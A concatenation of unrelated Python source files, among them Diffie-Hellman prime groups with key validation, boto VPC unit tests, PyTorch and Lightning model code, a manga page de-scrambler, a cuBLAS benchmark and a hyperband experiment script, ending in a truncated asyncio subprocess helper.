+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64"
+ "ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7"
+ "ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B"
+ "F12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31"
+ "43DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 4096-bit
16: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64"
+ "ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7"
+ "ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B"
+ "F12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31"
+ "43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7"
+ "88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA"
+ "2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6"
+ "287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED"
+ "1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9"
+ "93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199"
+ "FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 6144-bit
17: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E08"
+ "8A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B"
+ "302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9"
+ "A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE6"
+ "49286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8"
+ "FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C"
+ "180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718"
+ "3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D"
+ "04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7D"
+ "B3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D226"
+ "1AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFC"
+ "E0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B26"
+ "99C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB"
+ "04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2"
+ "233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127"
+ "D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934028492"
+ "36C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406"
+ "AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918"
+ "DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B33205151"
+ "2BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03"
+ "F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97F"
+ "BEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA"
+ "CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58B"
+ "B7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632"
+ "387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E"
+ "6DCC4024FFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
# 8192-bit
18: {
"prime": int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
+ "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
+ "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
+ "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
+ "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
+ "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
+ "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
+ "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
+ "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
+ "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
+ "15728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64"
+ "ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7"
+ "ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6B"
+ "F12FFA06D98A0864D87602733EC86A64521F2B18177B200C"
+ "BBE117577A615D6C770988C0BAD946E208E24FA074E5AB31"
+ "43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7"
+ "88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA"
+ "2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6"
+ "287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED"
+ "1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9"
+ "93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934028492"
+ "36C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BD"
+ "F8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831"
+ "179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B"
+ "DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF"
+ "5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6"
+ "D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F3"
+ "23A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA"
+ "CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE328"
+ "06A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55C"
+ "DA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE"
+ "12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E4"
+ "38777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300"
+ "741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F568"
+ "3423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD9"
+ "22222E04A4037C0713EB57A81A23F0C73473FC646CEA306B"
+ "4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A"
+ "062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A36"
+ "4597E899A0255DC164F31CC50846851DF9AB48195DED7EA1"
+ "B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F92"
+ "4009438B481C6CD7889A002ED5EE382BC9190DA6FC026E47"
+ "9558E4475677E9AA9E3050E2765694DFC81F56E880B96E71"
+ "60C980DD98EDD3DFFFFFFFFFFFFFFFFF",
base=16,
),
"generator": 2,
},
}
class DiffieHellman:
    """
    Class to represent the Diffie-Hellman key exchange protocol
    >>> alice = DiffieHellman()
    >>> bob = DiffieHellman()
    >>> alice_private = alice.get_private_key()
    >>> alice_public = alice.generate_public_key()
    >>> bob_private = bob.get_private_key()
    >>> bob_public = bob.generate_public_key()
    >>> # generating shared key using the DH object
    >>> alice_shared = alice.generate_shared_key(bob_public)
    >>> bob_shared = bob.generate_shared_key(alice_public)
    >>> assert alice_shared == bob_shared
    >>> # generating shared key using static methods
    >>> alice_shared = DiffieHellman.generate_shared_key_static(
    ...     alice_private, bob_public
    ... )
    >>> bob_shared = DiffieHellman.generate_shared_key_static(
    ...     bob_private, alice_public
    ... )
    >>> assert alice_shared == bob_shared
    """

    # Current minimum recommendation is 2048 bit (group 14)
    def __init__(self, group: int = 14) -> None:
        if group not in primes:
            raise ValueError("Unsupported Group")
        self.prime = primes[group]["prime"]
        self.generator = primes[group]["generator"]
        # 256-bit private exponent drawn from the OS CSPRNG.
        self.__private_key = int(hexlify(urandom(32)), base=16)

    def get_private_key(self) -> str:
        """Return the private key as a hex string (no ``0x`` prefix)."""
        return hex(self.__private_key)[2:]

    def generate_public_key(self) -> str:
        """Return g^x mod p as a hex string."""
        public_key = pow(self.generator, self.__private_key, self.prime)
        return hex(public_key)[2:]

    def is_valid_public_key(self, key: int) -> bool:
        # NIST SP800-56 check: 2 <= key <= p - 2 and key^((p-1)/2) == 1 mod p.
        return (
            2 <= key <= self.prime - 2
            and pow(key, (self.prime - 1) // 2, self.prime) == 1
        )

    def generate_shared_key(self, other_key_str: str) -> str:
        """Derive the shared secret from the peer's public key (hex string).

        Raises:
            ValueError: if the peer's key fails the SP800-56 validation.
        """
        other_key = int(other_key_str, base=16)
        if not self.is_valid_public_key(other_key):
            raise ValueError("Invalid public key")
        shared_key = pow(other_key, self.__private_key, self.prime)
        return sha256(str(shared_key).encode()).hexdigest()

    @staticmethod
    def is_valid_public_key_static(remote_public_key_str: int, prime: int) -> bool:
        # NIST SP800-56 check, same as the instance method.
        # NOTE(review): despite the `_str` suffix this parameter is an int;
        # the name is kept for backward compatibility with keyword callers.
        return (
            2 <= remote_public_key_str <= prime - 2
            and pow(remote_public_key_str, (prime - 1) // 2, prime) == 1
        )

    @staticmethod
    def generate_shared_key_static(
        local_private_key_str: str, remote_public_key_str: str, group: int = 14
    ) -> str:
        """Derive the shared secret without instantiating DiffieHellman."""
        local_private_key = int(local_private_key_str, base=16)
        remote_public_key = int(remote_public_key_str, base=16)
        prime = primes[group]["prime"]
        if not DiffieHellman.is_valid_public_key_static(remote_public_key, prime):
            raise ValueError("Invalid public key")
        shared_key = pow(remote_public_key, local_private_key, prime)
        return sha256(str(shared_key).encode()).hexdigest()
if __name__ == "__main__":
    import doctest

    # Run the class doctests as a smoke test.
    doctest.testmod()
|
11521823
|
from tests.unit import unittest
from tests.unit import AWSMockServiceTestCase
from boto.vpc import VPCConnection, CustomerGateway
class TestDescribeCustomerGateways(AWSMockServiceTestCase):
    """DescribeCustomerGateways: request building and response parsing."""

    connection_class = VPCConnection

    def default_body(self):
        # Canned EC2 API response served by the mocked connection.
        return """
<DescribeCustomerGatewaysResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
    <requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
    <customerGatewaySet>
        <item>
            <customerGatewayId>cgw-b4dc3961</customerGatewayId>
            <state>available</state>
            <type>ipsec.1</type>
            <ipAddress>172.16.58.3</ipAddress>
            <bgpAsn>65534</bgpAsn>
            <tagSet/>
        </item>
    </customerGatewaySet>
</DescribeCustomerGatewaysResponse>
"""

    def test_get_all_customer_gateways(self):
        self.set_http_response(status_code=200)
        api_response = self.service_connection.get_all_customer_gateways(
            'cgw-b4dc3961',
            filters=[('state', ['pending', 'available']),
                     ('ip-address', '172.16.58.3')])
        # Multi-valued filters must expand into numbered Filter.N.Value.M params.
        self.assert_request_parameters({
            'Action': 'DescribeCustomerGateways',
            'CustomerGatewayId.1': 'cgw-b4dc3961',
            'Filter.1.Name': 'state',
            'Filter.1.Value.1': 'pending',
            'Filter.1.Value.2': 'available',
            'Filter.2.Name': 'ip-address',
            'Filter.2.Value.1': '172.16.58.3'},
            ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
                                  'SignatureVersion', 'Timestamp',
                                  'Version'])
        # assertEqual replaces the deprecated assertEquals alias
        # (removed in Python 3.12).
        self.assertEqual(len(api_response), 1)
        self.assertIsInstance(api_response[0], CustomerGateway)
        self.assertEqual(api_response[0].id, 'cgw-b4dc3961')
class TestCreateCustomerGateway(AWSMockServiceTestCase):
    """CreateCustomerGateway: request building and response parsing."""

    connection_class = VPCConnection

    def default_body(self):
        # Canned EC2 API response served by the mocked connection.
        return """
<CreateCustomerGatewayResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
    <requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
    <customerGateway>
        <customerGatewayId>cgw-b4dc3961</customerGatewayId>
        <state>pending</state>
        <type>ipsec.1</type>
        <ipAddress>172.16.58.3</ipAddress>
        <bgpAsn>65534</bgpAsn>
        <tagSet/>
    </customerGateway>
</CreateCustomerGatewayResponse>
"""

    def test_create_customer_gateway(self):
        self.set_http_response(status_code=200)
        api_response = self.service_connection.create_customer_gateway(
            'ipsec.1', '172.16.58.3', 65534)
        self.assert_request_parameters({
            'Action': 'CreateCustomerGateway',
            'Type': 'ipsec.1',
            'IpAddress': '172.16.58.3',
            'BgpAsn': 65534},
            ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
                                  'SignatureVersion', 'Timestamp',
                                  'Version'])
        self.assertIsInstance(api_response, CustomerGateway)
        # assertEqual replaces the deprecated assertEquals alias
        # (removed in Python 3.12).
        self.assertEqual(api_response.id, 'cgw-b4dc3961')
        self.assertEqual(api_response.state, 'pending')
        self.assertEqual(api_response.type, 'ipsec.1')
        self.assertEqual(api_response.ip_address, '172.16.58.3')
        self.assertEqual(api_response.bgp_asn, 65534)
class TestDeleteCustomerGateway(AWSMockServiceTestCase):
    """DeleteCustomerGateway: request building and response parsing."""

    connection_class = VPCConnection

    def default_body(self):
        # Canned EC2 API response served by the mocked connection.
        return """
<DeleteCustomerGatewayResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
    <requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
    <return>true</return>
</DeleteCustomerGatewayResponse>
"""

    def test_delete_customer_gateway(self):
        self.set_http_response(status_code=200)
        api_response = self.service_connection.delete_customer_gateway('cgw-b4dc3961')
        self.assert_request_parameters({
            'Action': 'DeleteCustomerGateway',
            'CustomerGatewayId': 'cgw-b4dc3961'},
            ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
                                  'SignatureVersion', 'Timestamp',
                                  'Version'])
        # assertEqual replaces the deprecated assertEquals alias
        # (removed in Python 3.12).
        self.assertEqual(api_response, True)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
11521830
|
import torch.nn as nn
from .Encoder import Encoder
from .Decoder import Decoder
class Seq2Seq(nn.Module):
    """Encoder -> attention -> decoder pipeline packaged as one module.

    The three stages are supplied by the caller; this wrapper only chains
    them, passing the attention output as the decoder's context.
    """

    def __init__(self, encoder, attention, decoder):
        super().__init__()
        self.encoder = encoder
        self.attn = attention
        self.decoder = decoder

    def forward(self, x):
        # Run the three stages back to back on the input batch.
        return self.decoder(self.attn(self.encoder(x)))
|
11521850
|
import itertools
import pytest
from examples.my_heart_counts.six_minute_walk_activity import pipeline
# scope must be passed to the decorator; as a function parameter (the
# original form) pytest never saw it and the fixture stayed function-scoped.
@pytest.fixture(scope="module")
def dataframe():
    """Run the walk-activity pipeline once per module; return its first frame."""
    return pipeline.process()[0]
def test_data_is_correctly_loaded(dataframe):
    # The processed frame must expose exactly these two columns, in order.
    assert list(dataframe.columns) == ["recordId", "numberOfSteps_max"]
|
11521853
|
from manga_py.crypt import Puzzle
from manga_py.fs import get_temp_path, rename
from manga_py.provider import Provider
class TonariNoYjJp:
    """Helper for tonarinoyj.jp: chapter discovery and image de-scrambling.

    Pages arrive as div_num x div_num scrambled tiles; ``matrix`` maps each
    scrambled tile index to its original position.
    """
    provider = None
    div_num = 4
    multiply = 8
    matrix = None
    temp_path = None

    def __init__(self, provider: Provider):
        self.provider = provider
        self.temp_path = get_temp_path('__image_matrix{}.png')
        # Transpose mapping over the tile grid (row-major <-> column-major).
        matrix = {}
        for i in range(self.div_num * self.div_num):
            matrix[i] = (i % self.div_num) * self.div_num + int(i / self.div_num)
        self.matrix = matrix

    def _chapter_api_content(self, idx) -> dict:
        """Fetch one page of the episode list; {} if the reply is not JSON."""
        api = '{}/api/viewer/readable_products?current_readable_product_id={}&' \
              'number_since=99&number_until=-1&read_more_num=100&type=episode'
        content = self.provider.http_get(api.format(self.provider.domain, idx))
        # Guard against an empty reply before peeking at the first character
        # (the original indexed content[0] unconditionally).
        if content and content[0] == '{':
            return self.provider.json.loads(content)
        return {}

    def _check_need_next_chapter(self, next_url):
        """True while nextUrl still points past the first episode page."""
        if next_url:
            # Raw string: '\d' is an invalid escape in a plain literal.
            test = self.provider.re.search(r'number_since=(\d+)', next_url).group(1)
            if int(test) > 1:
                return True
        return False

    def get_chapters(self, idx) -> list:
        """Return episode ids, following pagination recursively."""
        content = self._chapter_api_content(idx)
        items = self.provider.document_fromstring(content.get('html', '<html></html>'), '.series-episode-list-thumb')
        need_more = self._check_need_next_chapter(content.get('nextUrl', None))
        if need_more:
            items += self.get_chapters(content.get('nextUrl'))
        re = self.provider.re.compile(r'/episode-thumbnail/(\d+)')
        return [re.search(i.get('src')).group(1) for i in items]

    def solve_image(self, path, idx):
        """De-scramble one downloaded page in place."""
        try:
            solver = Puzzle(self.div_num, self.div_num, self.matrix, self.multiply)
            solver.need_copy_orig = True
            tmp = self.temp_path.format(idx)
            solver.de_scramble(path, tmp)
            rename(tmp, path)
        except Exception:
            # Deliberate best-effort: a failed de-scramble keeps the raw image.
            pass
|
11521880
|
import pytest
from .graphql import assert_query
@pytest.mark.django_db
def test_image(client):
    # Query a single image (id '1') through the GraphQL assertion helper.
    assert_query(client, 'image', '1')
@pytest.mark.django_db
def test_image_with_focal_point(client):
    # Image '2' — presumably the fixture with a focal point set; verify query.
    assert_query(client, 'image', '2')
@pytest.mark.django_db
def test_image_with_rendition(client):
    # Query image '1' including its 'rendition' field.
    assert_query(client, 'image', '1', 'rendition')
@pytest.mark.django_db
def test_images_list(client):
    # Query the full image list.
    assert_query(client, 'images', 'all')
11522024
|
import pytorch_lightning as pl
import torch
import torch.nn as nn
from quickvision.models.components import create_torchvision_backbone
from quickvision.models.detection.faster_rcnn import create_fastercnn_backbone
from quickvision.models.detection.utils import _evaluate_iou, _evaluate_giou
from torchvision.models.detection.faster_rcnn import (fasterrcnn_resnet50_fpn, FasterRCNN, FastRCNNPredictor,)
__all__ = ["LitFRCNN"]
class LitFRCNN(pl.LightningModule):
    """
    Creates a Faster CNN which can be fine-tuned.
    """

    def __init__(self, learning_rate: float = 0.0001, num_classes: int = 91,
                 backbone: str = None, fpn: bool = True,
                 pretrained_backbone: str = None, trainable_backbone_layers: int = 3, **kwargs,):
        """
        Args:
            learning_rate: the learning rate
            num_classes: number of detection classes (including background)
            backbone: name of a torchvision backbone; None selects the stock
                COCO-pretrained ResNet50-FPN detector
            fpn: whether to attach a feature pyramid to a custom backbone
            pretrained_backbone (str): if "imagenet", returns a model with backbone pre-trained on Imagenet
            trainable_backbone_layers: number of trainable resnet layers starting from final block
        """
        super().__init__()
        self.learning_rate = learning_rate
        self.num_classes = num_classes
        self.backbone = backbone
        if backbone is None:
            # Stock detector with its box head swapped for num_classes outputs.
            self.model = fasterrcnn_resnet50_fpn(pretrained=True,
                                                 trainable_backbone_layers=trainable_backbone_layers,)
            in_features = self.model.roi_heads.box_predictor.cls_score.in_features
            self.model.roi_heads.box_predictor = FastRCNNPredictor(in_features, self.num_classes)
        else:
            # Custom backbone path: build the backbone, then a fresh FasterRCNN.
            backbone_model = create_fastercnn_backbone(self.backbone, fpn, pretrained_backbone,
                                                       trainable_backbone_layers, **kwargs,)
            self.model = FasterRCNN(backbone_model, num_classes=num_classes, **kwargs)

    def forward(self, x):
        # Inference-only forward: eval mode makes the model return detections
        # instead of losses.
        self.model.eval()
        return self.model(x)

    def training_step(self, batch, batch_idx):
        images, targets = batch
        targets = [{k: v for k, v in t.items()} for t in targets]
        # fasterrcnn takes both images and targets for training, returns
        # a dict of per-component losses; total loss is their sum.
        loss_dict = self.model(images, targets)
        loss = sum(loss for loss in loss_dict.values())
        return {"loss": loss, "log": loss_dict}

    def validation_step(self, batch, batch_idx):
        images, targets = batch
        # fasterrcnn takes only images for eval() mode
        outs = self.model(images)
        # Mean IoU / GIoU between predictions and targets for this batch.
        iou = torch.stack([_evaluate_iou(t, o) for t, o in zip(targets, outs)]).mean()
        giou = torch.stack([_evaluate_giou(t, o) for t, o in zip(targets, outs)]).mean()
        return {"val_iou": iou, "val_giou": giou}

    def validation_epoch_end(self, outs):
        # Aggregate the per-batch metrics over the whole validation epoch.
        avg_iou = torch.stack([o["val_iou"] for o in outs]).mean()
        avg_giou = torch.stack([o["val_giou"] for o in outs]).mean()
        logs = {"val_iou": avg_iou, "val_giou": avg_giou}
        return {"avg_val_iou": avg_iou, "avg_val_giou": avg_giou, "log": logs}

    def configure_optimizers(self):
        # Plain SGD with momentum; weight decay regularizes the detector head.
        return torch.optim.SGD(self.model.parameters(), lr=self.learning_rate,
                               momentum=0.9, weight_decay=0.005,)
|
11522026
|
import torch
import os
import sklearn.model_selection
def pad(channel, maxlen):
    """Right-pad a 1-D sequence to ``maxlen`` by repeating its final value."""
    data = torch.tensor(channel)
    # Fill the whole buffer with the last observation, then overwrite the
    # prefix with the real data.
    padded = torch.full((maxlen,), data[-1])
    padded[: data.size(0)] = data
    return padded
def subsample(X, y, subsample_rate):
    """Thin the last (time) axis of X, keeping every ``subsample_rate``-th step.

    Labels ``y`` pass through unchanged; rate 1 returns X untouched.
    """
    if subsample_rate == 1:
        return X, y
    return X[:, :, ::subsample_rate], y
def save_data(dir, **tensors):
    """Serialize each keyword tensor to ``<dir>/<name>.pt``."""
    for name, value in tensors.items():
        torch.save(value, str(dir / name) + ".pt")
def load_data(dir):
    """Load every ``*.pt`` tensor in ``dir`` into a dict keyed by file stem."""
    tensors = {}
    for filename in os.listdir(dir):
        if filename.endswith(".pt"):
            # splitext strips only the final extension, so names containing
            # dots (e.g. "a.b.pt") round-trip with save_data; the original
            # split(".")[0] truncated them to "a".
            tensor_name = os.path.splitext(filename)[0]
            tensors[tensor_name] = torch.load(str(dir / filename))
    return tensors
def normalise_data(X, y):
    """Z-normalise each feature of X using statistics from the training
    split only (NaNs in the training data are ignored)."""
    train_X, _, _ = split_data(X, y)
    normalised = []
    for feature, train_feature in zip(X.unbind(dim=-1), train_X.unbind(dim=-1)):
        valid = train_feature.masked_select(~torch.isnan(train_feature))
        mu = valid.mean()  # compute statistics using only training data.
        sigma = valid.std()
        normalised.append((feature - mu) / (sigma + 1e-5))
    return torch.stack(normalised, dim=-1)
def split_data(tensor, stratify):
    """Stratified 0.7/0.15/0.15 train/val/test split with fixed seeds."""
    # First cut: 70% train vs 30% holdout, stratified on the labels.
    train_part, holdout, _, holdout_labels = sklearn.model_selection.train_test_split(
        tensor,
        stratify,
        train_size=0.7,
        random_state=0,
        shuffle=True,
        stratify=stratify,
    )
    # Second cut: split the holdout evenly into validation and test.
    val_part, test_part = sklearn.model_selection.train_test_split(
        holdout,
        train_size=0.5,
        random_state=1,
        shuffle=True,
        stratify=holdout_labels,
    )
    return train_part, val_part, test_part
|
11522078
|
import pycuda.autoinit
from pycuda import gpuarray
import numpy as np
from skcuda import cublas
from time import time
m = 5000
n = 10000
k = 10000
def compute_gflops(precision='S'):
    """Time one cuBLAS GEMM (C = alpha*A*B + beta*C) and return GFLOPS.

    Args:
        precision: 'S' (float32) or 'D' (float64); anything else returns -1
            to preserve the original error convention.
    """
    if precision == 'S':
        float_type = 'float32'
    elif precision == 'D':
        float_type = 'float64'
    else:
        return -1
    A = np.random.randn(m, k).astype(float_type)
    B = np.random.randn(k, n).astype(float_type)
    C = np.random.randn(m, n).astype(float_type)
    # cuBLAS expects column-major storage, hence the transposed copies.
    A_cm = A.T.copy()
    B_cm = B.T.copy()
    C_cm = C.T.copy()
    A_gpu = gpuarray.to_gpu(A_cm)
    B_gpu = gpuarray.to_gpu(B_cm)
    C_gpu = gpuarray.to_gpu(C_cm)
    alpha = np.random.randn()
    beta = np.random.randn()
    transa = cublas._CUBLAS_OP['N']
    transb = cublas._CUBLAS_OP['N']
    lda = m
    ldb = k
    ldc = m
    # Resolve cublasSgemm / cublasDgemm via getattr instead of exec'ing a
    # formatted source string (same dispatch, no dynamic code execution).
    gemm = getattr(cublas, 'cublas%sgemm' % precision)
    t = time()
    handle = cublas.cublasCreate()
    gemm(handle, transa, transb, m, n, k, alpha, A_gpu.gpudata, lda,
         B_gpu.gpudata, ldb, beta, C_gpu.gpudata, ldc)
    cublas.cublasDestroy(handle)
    t = time() - t
    # NOTE(review): the timed region includes handle create/destroy, matching
    # the original measurement.
    gflops = 2*m*n*(k+1)*(10**-9) / t
    return gflops
if __name__ == '__main__':
    # Benchmark both precisions back to back.
    print('Single-precision performance: %s GFLOPS' % compute_gflops('S'))
    print('Double-precision performance: %s GFLOPS' % compute_gflops('D'))
|
11522099
|
# Initialize the PyObjC bridge for the system OpenDirectory framework and
# inject its classes/constants into this module's namespace.
import objc as _objc

__bundle__ = _objc.initFrameworkWrapper(
    "OpenDirectory",
    frameworkIdentifier="com.apple.OpenDirectory",
    frameworkPath=_objc.pathForFramework(
        "/System/Library/Frameworks/OpenDirectory.framework"
    ),
    globals=globals()
)
|
11522133
|
import os
import sys
import json
import logging
import numpy as np
logging.basicConfig(level=logging.INFO)
from robo.solver.hyperband_datasets_size_original_incumbent import HyperBand_DataSubsetsOriginalIncumbent
from hpolib.benchmarks.ml.svm_benchmark import SvmOnMnist, SvmOnVehicle, SvmOnCovertype, SvmOnAdult, SvmOnHiggs, SvmOnLetter
from hpolib.benchmarks.ml.residual_networks import ResidualNeuralNetworkOnCIFAR10
from hpolib.benchmarks.ml.conv_net import ConvolutionalNeuralNetworkOnCIFAR10, ConvolutionalNeuralNetworkOnSVHN
# CLI: <run_id> <dataset> <seed>
run_id = int(sys.argv[1])
dataset = sys.argv[2]
seed = int(sys.argv[3])

rng = np.random.RandomState(seed)

# dataset name -> (benchmark class, output-subdirectory pattern)
_BENCHMARKS = {
    "mnist": (SvmOnMnist, "svm_%s"),
    "vehicle": (SvmOnVehicle, "svm_%s"),
    "covertype": (SvmOnCovertype, "svm_%s"),
    "higgs": (SvmOnHiggs, "svm_%s"),
    "adult": (SvmOnAdult, "svm_%s"),
    "letter": (SvmOnLetter, "svm_%s"),
    "cifar10": (ConvolutionalNeuralNetworkOnCIFAR10, "cnn_%s"),
    "svhn": (ConvolutionalNeuralNetworkOnSVHN, "cnn_%s"),
    "res_net": (ResidualNeuralNetworkOnCIFAR10, "%s"),
}
if dataset not in _BENCHMARKS:
    # Fail fast with a clear message instead of a NameError on `f` below.
    raise ValueError("Unknown dataset: %s" % dataset)
benchmark_cls, prefix = _BENCHMARKS[dataset]
f = benchmark_cls(rng=rng)
output_path = "./experiments/fabolas/results/%s/hyperband_%d" % (prefix % dataset, run_id)

os.makedirs(output_path, exist_ok=True)

eta = 3.
# Number of brackets, derived from the benchmark's smallest subset size.
B = -int(np.log(f.s_min) / np.log(3))
print(B)

opt = HyperBand_DataSubsetsOriginalIncumbent(f, eta, eta**(-(B-1)), output_path=output_path, rng=rng)
opt.run(int(20 / B * 1.5))

# Evaluate every incumbent configuration on the held-out test set.
test_error = [f.objective_function_test(c)["function_value"] for c in opt.incumbents]

results = dict()
results["test_error"] = test_error
results["runtime"] = opt.runtime
results["time_func_eval"] = opt.time_func_eval_incumbent
results["run_id"] = run_id

with open(os.path.join(output_path, 'results_%d.json' % run_id), 'w') as fh:
    json.dump(results, fh)
|
11522148
|
import argparse
import asyncio
import datetime
import logging
import os
import shutil
import subprocess
"""
async def fb(cmd):
import select
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
poller = select.poll()
poller.register(proc.stdout, select.POLLIN)
poller.register(proc.stderr, select.POLLIN)
while True:
for result in poller.poll(1):
if result[0] == proc.stdout.name:
print(proc.stdout.readline())
if result[1] == proc.stderr.name:
print(proc.stderr.readline())
"""
"""
import asyncio
async def runc(args):
proc = await asyncio.create_subprocess_exec(*args)
while proc.returncode is None:
out = await proc.stdout.readline()
err = await proc.stderr.readline()
l1 = out.decode().rstrip()
l2 = err.decode().rstrip()
# Handle line (somehow)
print(out)
print(err)
print(l1)
print(l2)
args = (['ping','-c','10','google.com'])
asyncio.run(runc(args))
"""
# https://stackoverflow.com/questions/51133407/capture-stdout-and-stderr-of-process-that-runs-an-infinite-loop
# https://stackoverflow.com/questions/51133407/capture-stdout-and-stderr-of-process-that-runs-an-infinite-loop
async def fb(cmd):
    """Run *cmd* (exec, not shell) and stream its output into the log.

    Returns:
        The subprocess exit code.
    """
    # The original referenced a module-global `log` that was never defined
    # (main() only creates a local) — resolve the logger explicitly instead.
    logger = logging.getLogger('qbittorrent.postprocess')
    proc = await asyncio.create_subprocess_exec(
        *cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE)
